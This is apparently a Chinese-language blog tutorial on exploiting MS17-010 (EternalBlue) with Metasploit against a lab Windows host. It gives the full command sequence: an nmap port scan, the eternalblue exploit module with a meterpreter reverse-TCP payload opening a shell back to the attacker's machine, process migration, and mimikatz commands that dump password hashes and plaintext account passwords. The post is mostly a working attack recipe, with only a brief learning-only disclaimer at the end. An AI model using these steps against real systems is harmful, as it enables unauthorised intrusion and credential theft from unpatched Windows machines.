詳解利用ms17-010配合mimikatz獲取目標主機賬戶密碼

第一步:使用Nmap掃描目標主機開放端口
要知道ms17010是對445端口進行攻擊的,所以我們要先對目標機進行端口掃描

nmap 192.168.48.110

第二步:獲取權限

在這裏我們利用ms17010(永恆之藍)漏洞來獲取靶機的權限。
運行msf,使用ms17010漏洞。

msf5 > use exploit/windows/smb/ms17_010_eternalblue 



接下來show options查看需要配置的參數

msf5 exploit(windows/smb/ms17_010_eternalblue) > show options 


剩下的就是需要我們設置LHOST、RHOST、payload,分別是攻擊機IP、靶機IP、攻擊載荷。

msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.48.1  //攻擊機ip
lhost => 192.168.48.1
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.48.110  //靶機ip
rhost => 192.168.48.110
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp //攻擊載荷
payload => windows/x64/meterpreter/reverse_tcp


一切配置完畢後開始攻擊

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit 

這裏可以看到我們已經攻擊成功了,拿到了靶機的shell。

拿到權限後先不要着急幹別的,這裏我們最好先進行進程遷移,確保我們的msf程序在目標機上不會受到干擾

先使用ps命令查看進程

meterpreter > ps


因爲我們是64位操作系統,所以我們選擇遷移到64位的進程上。

meterpreter > migrate 516  //這裏的516是PID,就是進程ID

第三步:使用mimikatz模塊獲取目標機明文密碼

使用mimikatz模塊

meterpreter > load mimikatz

獲取靶機密碼哈希

meterpreter > msv


獲取靶機明文密碼

meterpreter > kerberos 


到這裏攻擊就結束了,成功拿到了目標機的明文賬戶密碼。

注:本文僅供參考學習,請勿在網上搞破壞,觸犯法律者應承擔相應的法律責任!
 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章